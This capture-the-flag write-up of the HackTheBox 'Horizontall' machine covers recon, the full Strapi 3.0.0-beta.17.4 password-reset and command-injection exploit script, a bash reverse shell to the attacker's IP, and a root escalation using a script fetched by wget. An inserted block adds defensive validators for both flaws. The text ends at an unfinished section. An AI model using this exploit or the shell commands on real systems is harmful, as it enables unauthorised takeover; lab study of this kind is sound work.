title: HackTheBox-Horizontall-phar deserialization author: Mosaic Theory layout: true categories: Vulnerability lab tags:
• Target practice diary
I think it's hard winning a war with words.
I think armchair strategizing achieves nothing.
HackTheBox-Horizontall
Recon:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-17 03:37:03 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.11.105
Discovered open port 80/tcp on 10.10.11.105
Nmap scan report for horizontall.htb (10.10.11.105)
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.16 seconds
>> whatweb http://horizontall.htb
http://horizontall.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], IP[10.10.11.105], Script, Title[horizontall], X-UA-Compatible[IE=edge], nginx[1.14.0]
The page has no real content; what you see is not what is there:
>> dirsearch -u http://horizontall.htb
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/mosaictheory/.dirsearch/reports/horizontall.htb/_22-05-17_11-43-09.txt
Error Log: /home/mosaictheory/.dirsearch/logs/errors-22-05-17_11-43-09.log
Target: http://horizontall.htb/
[11:43:10] Starting:
[11:43:12] 301 - 194B - /js -> http://horizontall.htb/js/
[11:43:51] 301 - 194B - /css -> http://horizontall.htb/css/
[11:43:56] 200 - 4KB - /favicon.ico
[11:44:01] 301 - 194B - /img -> http://horizontall.htb/img/
[11:44:02] 200 - 901B - /index.html
[11:44:03] 403 - 580B - /js/
This site looks like a decoy; I should look for other sites:
>> gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t200
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://horizontall.htb/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/05/17 12:09:46 Starting gobuster in VHOST enumeration mode
===============================================================
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]
===============================================================
2022/05/17 12:11:17 Finished
===============================================================
>> whatweb http://api-prod.horizontall.htb/
http://api-prod.horizontall.htb/ [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], IP[10.10.11.105], Strict-Transport-Security[max-age=31536000; includeSubDomains], Title[Welcome to your API], UncommonHeaders[content-security-policy], X-Frame-Options[SAMEORIGIN], X-Powered-By[Strapi ], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block], nginx[1.14.0]
Strapi CMS. This page is also minimal, with only a welcome message:
>> curl http://api-prod.horizontall.htb/
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<title>Welcome to your API</title>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<style>
</style>
</head>
<body lang="en">
<section>
<div class="wrapper">
<h1>Welcome.</h1>
</div>
</section>
</body>
</html>
>> dirsearch -u http://api-prod.horizontall.htb
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/mosaictheory/.dirsearch/reports/api-prod.horizontall.htb/_22-05-17_12-15-04.txt
Error Log: /home/mosaictheory/.dirsearch/logs/errors-22-05-17_12-15-04.log
Target: http://api-prod.horizontall.htb/
[12:15:04] Starting:
[12:15:18] 200 - 854B - /ADMIN
[12:15:18] 200 - 854B - /Admin
[12:15:18] 200 - 854B - /Admin/login/
[12:15:23] 400 - 67B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[12:15:53] 200 - 1KB - /favicon.ico
[12:15:58] 200 - 413B - /index.html
[12:16:17] 200 - 121B - /robots.txt
[12:16:17] 200 - 507B - /reviews
Task Completed
I need a way to find the Strapi version; the page source contains this hint:
A lot of magic happens in this file. HtmlWebpackPlugin automatically includes all assets (e.g. bundle.js, main.css) with the correct HTML tags, which is why they are missing in this HTML file. Don't add any assets here! (Check out webpackconfig.js if you want to know more)
>> searchsploit strapi 3.0.0-beta.17.4
--------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------- ---------------------------------
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb
--------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
>> searchsploit -m multiple/webapps/50239.py
Exploit: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
URL: https://www.exploit-db.com/exploits/50239
Path: /usr/share/exploitdb/exploits/multiple/webapps/50239.py
File Type: Python script, ASCII text executable
Copied to: /home/mosaictheory/50239.py
# Exploit Title: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2021-08-30
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://strapi.io/
# Software Link: https://strapi.io/
# Version: Strapi CMS version 3.0.0-beta.17.4 or lower
# Tested on: Ubuntu 20.04
# CVE : CVE-2019-18818, CVE-2019-19609
#!/usr/bin/env python3
import requests
import json
from cmd import Cmd
import sys

if len(sys.argv) != 2:
    print("[-] Wrong number of arguments provided")
    print("[*] Usage: python3 exploit.py \n")
    sys.exit()


class Terminal(Cmd):
    # interactive prompt: every line typed is passed to code_exec()
    prompt = "$> "

    def default(self, args):
        code_exec(args)


def check_version():
    global url
    print("[+] Checking Strapi CMS Version running")
    version = requests.get(f"{url}/admin/init").text
    version = json.loads(version)
    version = version["data"]["strapiVersion"]
    if version == "3.0.0-beta.17.4":
        print("[+] Seems like the exploit will work!!!\n[+] Executing exploit\n\n")
    else:
        print("[-] Version mismatch trying the exploit anyway")


def password_reset():
    global url, jwt
    session = requests.session()
    params = {"code": {"$gt": 0},
              "password": "SuperStrongPassword1",
              "passwordConfirmation": "SuperStrongPassword1"
              }
    output = session.post(f"{url}/admin/auth/reset-password", json=params).text
    response = json.loads(output)
    # check for the token before indexing, so a failed reset exits cleanly
    # instead of raising KeyError
    if "jwt" not in output:
        print("[-] Password reset unsuccessfull\n[-] Exiting now\n\n")
        sys.exit(1)
    jwt = response["jwt"]
    username = response["user"]["username"]
    email = response["user"]["email"]
    print(f"[+] Password reset was successfully\n[+] Your email is: {email}\n[+] Your new credentials are: {username}:SuperStrongPassword1\n[+] Your authenticated JSON Web Token: {jwt}\n\n")


def code_exec(cmd):
    global jwt, url
    print("[+] Triggering Remote code executin\n[*] Rember this is a blind RCE don't expect to see output")
    headers = {"Authorization": f"Bearer {jwt}"}
    data = {"plugin": f"documentation && $({cmd})",
            "port": "1337"}
    out = requests.post(f"{url}/admin/plugins/install", json=data, headers=headers)
    print(out.text)


if __name__ == "__main__":
    url = sys.argv[1]
    if url.endswith("/"):
        url = url[:-1]
    check_version()
    password_reset()
    terminal = Terminal()
    terminal.cmdloop()
This is a chained exploit. First it resets a user's password (I don't know which user, but judging by the path it looks like admin). A successful reset returns a JWT token, which is then used to call /admin/plugins/install and run cmd. Rember this is a blind RCE don't expect to see output.
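As an added illustration (not part of the original writeup and not Strapi's own code), the server-side checks that would have stopped each half of this chain: the reset `code` must be a plain string token rather than a query object, and a plugin name must never contain shell metacharacters. The token format and plugin-name pattern are assumptions; the sample bodies are the two the exploit sends plus constructed benign ones.

```python
import json
import re

# Assumed formats (not Strapi's actual rules): an alphanumeric reset token and
# an npm-style package name with no shell metacharacters.
RESET_CODE_RE = re.compile(r"^[A-Za-z0-9]{16,128}$")
PLUGIN_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9._-]{0,63}$")


def reset_code_is_safe(code) -> bool:
    """CVE-2019-18818 root cause: `code` reached the ORM as {"$gt": 0}, which
    matches every user. Requiring a plain string of the expected shape closes it."""
    return isinstance(code, str) and RESET_CODE_RE.fullmatch(code) is not None


def plugin_name_is_safe(name) -> bool:
    """CVE-2019-19609 root cause: the plugin name was interpolated into a shell
    command, so 'documentation && $(id)' ran `id`. Allow-list the name instead."""
    return isinstance(name, str) and PLUGIN_NAME_RE.fullmatch(name) is not None


def classify(body: str) -> list:
    """Return the names of the checks a JSON request body fails ([] = passes)."""
    try:
        params = json.loads(body)
    except json.JSONDecodeError:
        return ["malformed-json"]
    if not isinstance(params, dict):
        return ["malformed-json"]
    findings = []
    if "code" in params and not reset_code_is_safe(params["code"]):
        findings.append("reset-code-operator-injection")
    if "plugin" in params and not plugin_name_is_safe(params["plugin"]):
        findings.append("plugin-name-command-injection")
    return findings


# Constructed sample bodies: the two the exploit above sends, plus benign ones.
SAMPLES = {
    "reset_attack": '{"code": {"$gt": 0}, "password": "SuperStrongPassword1",'
                    ' "passwordConfirmation": "SuperStrongPassword1"}',
    "reset_benign": '{"code": "3f1a9c2e4b7d8f0a1c2b3d4e5f60718a", "password": "p",'
                    ' "passwordConfirmation": "p"}',
    "install_attack": '{"plugin": "documentation && $(id)", "port": "1337"}',
    "install_benign": '{"plugin": "documentation", "port": "1337"}',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:15s} -> {classify(body) or 'ok'}")
```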
>> python3 50239.py http://api-prod.horizontall.htb
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjUyNzYzMDk0LCJleHAiOjE2NTUzNTUwOTR9.0WODcG0DqsHwETYjBNYwk9eVrLdIcY1xRV-rbkyDpFQ
$> id
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statusCode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}
$> bash -c 'bash -i >& /dev/tcp/10.10.16.7/9001 0>&1'
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
Reverse shell:
There is read access to the user's directory:
>> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.105] 36446
bash: cannot set terminal process group (1787): Inappropriate ioctl for device
bash: no job control in this shell
strapi@horizontall:~/myapi$
strapi@horizontall:~/myapi$ ls
api config favicon.ico package.json public
build extensions node_modules package-lock.json README.md
strapi@horizontall:~/myapi$ ls /home/
developer
strapi@horizontall:~/myapi$ cat /home/developer/user.txt
e1...................................
The password cannot be reused:
strapi@horizontall:~/myapi$ sudo -l
[sudo] password for strapi:
Sorry, try again.
[sudo] password for strapi:
Sorry, try again.
[sudo] password for strapi:
sudo: 3 incorrect password attempts
strapi@horizontall:~/myapi$
strapi@horizontall:/$ find / -perm /6000 2>/dev/null
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd
/usr/bin/mlocate
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/bsd-write
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/chage
/usr/bin/at
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/wall
/usr/bin/crontab
/usr/bin/ssh-agent
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/expiry
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/x86_64-linux-gnu/utempter/utempter
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/share/fonts
/usr/local/lib/python3.6
/usr/local/lib/python3.6/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/var/mail
/var/log/journal
/var/log/journal/3cc9504f7ded4867a4c8ca16476b1378
/var/local
/bin/fusermount
/bin/ping
/bin/su
/bin/umount
/bin/mount
strapi@horizontall:/$
CVE-2021-2043:
This vulnerability is a new one, so it doesn't count:
strapi@horizontall:~$ wget http://10.10.16.7/CVE-2021-2043.py
--2022-05-17 05:06:37-- http://10.10.16.7/CVE-2021-2043.py
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3448 (3.4K) [text/x-python]
Saving to: ‘CVE-2021-2043.py’
CVE-2021-2043.py 100%[===================>] 3.37K --.-KB/s in 0.1s
2022-05-17 05:06:38 (24.6 KB/s) - ‘CVE-2021-2043.py’ saved [3448/3448]
strapi@horizontall:~$ ls
CVE-2021-2043.py myapi
strapi@horizontall:~$ python3 CVE-2021-2043.py
# ID
sh: 1: ID: not found
# id
uid=0(root) gid=0(root) groups=0(root),1001(strapi)
#
CVE-2021-3129:
strapi@horizontall:~$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 144 10.10.11.105:36446 10.10.16.7:9001 ESTABLISHED on (0.34/0/0)
tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0)
udp 0 0 10.10.11.105:50522 1.1.1.1:53 ESTABLISHED off (0.00/0/0)
3306 should be a database, and 1337 is the welcome page:
strapi@horizontall:~$ curl 127.0.0.1:1337
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<title>Welcome to your API</title>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<style>
</style>
</head>
<body lang="en">
<section>
<div class="wrapper">
<h1>Welcome.</h1>
</div>
</section>
</body>
</html>